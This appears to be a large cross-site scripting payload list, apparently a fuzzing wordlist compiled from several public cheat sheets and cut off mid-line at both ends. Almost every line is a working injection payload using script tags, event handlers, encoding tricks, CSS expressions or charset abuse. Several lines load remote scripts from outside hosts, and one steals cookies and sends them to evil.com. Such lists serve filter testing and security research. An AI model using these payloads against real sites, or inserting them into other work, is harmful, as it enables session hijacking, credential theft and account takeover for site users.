style=\"background:url(/f#&#127;oo/;color:red/*/foo.jpg);\">X\n<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X\n<div id=\"x\">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>\n<x style=\"background:url('x&#1;;color:red;/*')\">XXX</x>\n<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>\n<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>\n<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>\n<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>\n<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\n<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>\n<meta charset=\"mac-farsi\">¼script¾javascript:alert(1)¼/script¾\nX<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >\n1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>\n1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>\n<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>\n1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>\n<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:javascript:alert(1)\">XXX</a>\n<x style=\"behavior:url(%(sct)s)\">\n<xml id=\"xss\" src=\"%(htc)s\"></xml> <label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>\n<event-source src=\"%(event)s\" onload=\"javascript:alert(1)\">\n<a href=\"javascript:javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\">\n<div id=\"x\">x</div> <xml:namespace prefix=\"t\"> <import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;\">\n<script>%(payload)s</script>\n<script src=%(jscript)s></script>\n<script language='javascript' src='%(jscript)s'></script>\n<script>javascript:alert(1)</script>\n<IMG SRC=\"javascript:javascript:alert(1);\">\n<IMG SRC=javascript:javascript:alert(1)>\n<IMG SRC=`javascript:javascript:alert(1)`>\n<SCRIPT SRC=%(jscript)s?<B>\n<FRAMESET><FRAME SRC=\"javascript:javascript:alert(1);\"></FRAMESET>\n<BODY ONLOAD=javascript:alert(1)>\n<BODY ONLOAD=javascript:javascript:alert(1)>\n<IMG SRC=\"jav    ascript:javascript:alert(1);\">\n<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>\n<SCRIPT/SRC=\"%(jscript)s\"></SCRIPT>\n<<SCRIPT>%(payload)s//<</SCRIPT>\n<IMG SRC=\"javascript:javascript:alert(1)\"\n<iframe src=%(scriptlet)s <\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:javascript:alert(1);\">\n<IMG DYNSRC=\"javascript:javascript:alert(1)\">\n<IMG LOWSRC=\"javascript:javascript:alert(1)\">\n<BGSOUND SRC=\"javascript:javascript:alert(1);\">\n<BR SIZE=\"&{javascript:alert(1)}\">\n<LAYER SRC=\"%(scriptlet)s\"></LAYER>\n<LINK REL=\"stylesheet\" HREF=\"javascript:javascript:alert(1);\">\n<STYLE>@import'%(css)s';</STYLE>\n<META HTTP-EQUIV=\"Link\" Content=\"<%(css)s>; REL=stylesheet\">\n<XSS STYLE=\"behavior: url(%(htc)s);\">\n<STYLE>li {list-style-image: url(\"javascript:javascript:alert(1)\");}</STYLE><UL><LI>XSS\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:javascript:alert(1);\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:javascript:alert(1);\">\n<IFRAME SRC=\"javascript:javascript:alert(1);\"></IFRAME>\n<TABLE BACKGROUND=\"javascript:javascript:alert(1)\">\n<TABLE><TD BACKGROUND=\"javascript:javascript:alert(1)\">\n<DIV STYLE=\"background-image: url(javascript:javascript:alert(1))\">\n<DIV STYLE=\"width:expression(javascript:alert(1));\">\n<IMG STYLE=\"xss:expr/*XSS*/ession(javascript:alert(1))\">\n<XSS STYLE=\"xss:expression(javascript:alert(1))\">\n<STYLE TYPE=\"text/javascript\">javascript:alert(1);</STYLE>\n<STYLE>.XSS{background-image:url(\"javascript:javascript:alert(1)\");}</STYLE><A CLASS=XSS></A>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:javascript:alert(1)\")}</STYLE>\n<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->\n<BASE HREF=\"javascript:javascript:alert(1);//\">\n<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"%(scriptlet)s\"></OBJECT>\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>\n<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"%(htc)s\"><xss:xss>XSS</xss:xss></HTML>\"\"\",\"XML namespace.\"),(\"\"\"<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:javascript:alert(1)\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\n<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;\"></BODY></HTML>\n<SCRIPT SRC=\"%(jpg)s\"></SCRIPT>\n<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-\n<form id=\"test\" /><button form=\"test\" formaction=\"javascript:javascript:alert(1)\">X\n<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>\n<P STYLE=\"behavior:url('#default#time2')\" end=\"0\" onEnd=\"javascript:alert(1)\">\n<STYLE>@import'%(css)s';</STYLE>\n<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>\n<meta charset= \"x-imap4-modified-utf7\"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>\n<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>\n<style onreadystatechange=javascript:javascript:alert(1);></style>\n<?xml version=\"1.0\"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>\n<embed code=%(scriptlet)s></embed>\n<embed code=javascript:javascript:alert(1);></embed>\n<embed src=%(jscript)s></embed>\n<frameset onload=javascript:javascript:alert(1)></frameset>\n<object onerror=javascript:javascript:alert(1)>\n<embed type=\"image\" src=%(scriptlet)s></embed>\n<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:javascript:alert(1);\">]]</C><X></xml>\n<IMG SRC=&{javascript:alert(1);};>\n<a href=\"jav&#65ascript:javascript:alert(1)\">test1</a>\n<a href=\"jav&#97ascript:javascript:alert(1)\">test1</a>\n<embed width=500 height=500 code=\"data:text/html,<script>%(payload)s</script>\"></embed>\n<iframe srcdoc=\"&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>\">\n';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";\nalert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\n></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n'';!--\"<XSS>=&{()}\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\n<IMG SRC=\"javascript:alert('XSS');\">\n<IMG SRC=javascript:alert('XSS')>\n<IMG SRC=JaVaScRiPt:alert('XSS')>\n<IMG SRC=javascript:alert(\"XSS\")>\n<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n<a onmouseover=\"alert(document.cookie)\">xxs link</a>\n<a onmouseover=alert(document.cookie)>xxs link</a>\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n<IMG SRC=# onmouseover=\"alert('xxs')\">\n<IMG SRC= onmouseover=\"alert('xxs')\">\n<IMG onmouseover=\"alert('xxs')\">\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG SRC=\"jav\tascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nperl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\n<SCRIPT SRC=//ha.ckers.org/.j>\n<IMG SRC=\"javascript:alert('XSS')\"\n<iframe src=http://ha.ckers.org/scriptlet.html <\n\\\";alert('XSS');//\n</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n<BODY BACKGROUND=\"javascript:alert('XSS')\">\n<IMG DYNSRC=\"javascript:alert('XSS')\">\n<IMG LOWSRC=\"javascript:alert('XSS')\">\n<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n<IMG SRC='vbscript:msgbox(\"XSS\")'>\n<IMG SRC=\"livescript:[code]\">\n<BODY ONLOAD=alert('XSS')>\n<BGSOUND SRC=\"javascript:alert('XSS');\">\n<BR SIZE=\"&{alert('XSS')}\">\n<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\n<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">\n<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>\n<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">\n<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\n<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\nexp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\n<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n<XSS STYLE=\"xss:expression(alert('XSS'))\">\n<XSS STYLE=\"behavior: url(xss.htc);\">\n¼script¾alert(¢XSS¢)¼/script¾\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">\n<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>\n<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\n<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">\n<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">\n<DIV STYLE=\"width: expression(alert('XSS'));\">\n<BASE HREF=\"javascript:alert('XSS');//\">\n <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>\n<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>\n<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>\n<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->\n<? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>\n<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\n<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">\n <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<A HREF=\"http://66.102.7.147/\">XSS</A>\n<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>\n<A HREF=\"http://1113982867/\">XSS</A>\n<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>\n<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>\n<A HREF=\"htt\tp://6\t6.000146.0x7.147/\">XSS</A>\n<iframe %00 src=\"&Tab;javascript:prompt(1)&Tab;\"%00>\n<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'\n<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"\n<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}\n<img/src=`%00` onerror=this.onerror=confirm(1) \n<form><isindex formaction=\"javascript&colon;confirm(1)\"\n<img src=`%00`&NewLine; onerror=alert(1)&NewLine;\n<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">\n<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/\n&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>%00\n<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">\n<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>\n<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script\n<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">\n<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\n<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X\n</script><img/*%00/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/%00*/onerror='eval(src)'>\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\n<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>\n<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a\nhttp://www.google<script .com>alert(document.location)</script\n<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a\n<img/src=@&#32;&#13; onerror = prompt('&#49;')\n<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\n</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\n&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">\n<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>\n<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/\n<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>\n<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\n<script ~~~>alert(0%0)</script ~~~>\n<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\n<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN\n<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)\n&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'\n&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\n<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^\n<div/style=\"width:expression(confirm(1))\">X</div> {IE7}\n<iframe/%00/ src=javaSCRIPT&colon;alert(1)\n//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//\n/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>\n//|\\\\ <script //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\\\ </script //|\\\\\n</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>\n<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">\n</plaintext\\></|\\><plaintext/onmouseover=prompt(1)\n</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}\n<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<%<!--'%><script>alert(1);</script -->\n<script src=\"data:text/javascript,alert(1)\"></script>\n<iframe/src \\/\\/onload = prompt(1)\n<iframe/onreadystatechange=alert(1)\n<svg/onload=alert(1)\n<input value=<><iframe/src=javascript:confirm(1)\n<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>\nhttp://www.<script>alert(1)</script .com\n<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\n<svg><script ?>alert(1)\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<img src=`xx:xx`onerror=alert(1)>\n<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>\n<svg contentScriptType=text/vbs><script>MsgBox+1\n<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script\n<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<script>+-+-1-+-+alert(1)</script>\n<body/onload=&lt;!--&gt;&#10alert(1)>\n<script itworksinallbrowsers>/*<script* */alert(1)</script\n<img src ?itworksonchrome?\\/onerror = alert(1)\n<svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script onlypossibleinopera:-)> alert(1)\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<script x> alert(1) </script 1=2\n<div/onmouseover='alert(1)'> style=\"x:\">\n<--`<img/src=` onerror=alert(1)> --!>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\n<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>\n\"><img src=x onerror=window.open('https://www.google.com/');>\n<form><button formaction=javascript&colon;alert(1)>CLICKME\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\n<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>\n'-confirm`1`-'\n<base href=data:/,alert(1)/><script src=\"jquery.js\"></script>\n`<b\\x20#x (click)=\"x.inn\\x65rHTML='\\x3ciframe onload=alert(1)\\x3e'\">CLICK</b>`\n\" onmouseover=\"alert(4321)\" blah=\"\n/><input>\n<script>({' \\ '(){alert(1)}})[` \\ `]()</script>\n<embed src=URL onload=alert('xss')>\n<body onload=\"'use strict';throw new class extends Function{}('alert(1)')``\">\n<body onblur=x onload=popup=1;>\n<body onerror=popup=1;><svg/onfocus=import> \n<body onload=popup=1;>\n<body rel='popup=1;'onerror=popup=1; onload=x >\n<button autofocus=x onchange='import'onfocus=popup=1; >\n<button data=popup=1; id='x'onfocus=popup=1; >\n<button onclick=popup=1;>\n<canvas onclick=\"popup=1;\">\n<embed onfocus='popup=1;'><img\n<form formaction=popup=1; onclick=popup=1;><object>  \n<form href='x'onclick=popup=1;><select>\n<frameset id=\"x\"onload=popup=1;>\n<frameset onload=popup=1;>\n<iframe onload=popup=1;>\n<img srcset=popup=1; onerror=popup=1;>\n<input onclick=popup=1; >\n<input onfocus=popup=1; autofocus=\"x\">\n<input srcset=x href=x onclick=popup=1; >\n<link rel=import href=data:text/html;base64,PHNjcmlwdD5wb3B1cD0xOzwvc2NyaXB0Pg==>  \n<object onfocus=popup=1;>\n<select onclick=\"popup=1;\">\n<select onclick=popup=1;>\n<source onclick=popup=1; ><frameset/onload=popup=1;>  \n<svg onclick=popup=1;>\n<svg onload=popup=1;>\n<video onclick=popup=1;>\nlocation='javascript://\\u2028alert(1)';\n<svg onresize=\"alert(1)\">\n<applet/object onerror=alert('XSS')> \n<frameset/onpageshow=alert(1)> \n<div onactivate=alert('Xss') id=xss style=overflow:scroll>\n<details open ontoggle=alert(1)>\n<svg/onload=setTimeout`alert\\`1\\``>\n%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E \n<select autofocus onfocus=alert`1`\n<meta/content=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==\"http-equiv=refresh>\n\\\"};with(window){onload=function(){ with(document){k=cookie;};with(window){location='http://evil.com/?a=test'%2bk;};}}//;\n<h1 _-_-_-ng_-_-_click=\"$event.view.location.replace('javascript:alert(1)')\">XSS</h1>\n{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}\n<script>alert(123)</script>\n<script>alert(\"hellox worldss\");</script>\njavascript:alert(\"hellox worldss\")\n<img src=\"javascript:alert('XSS');\">\n<img 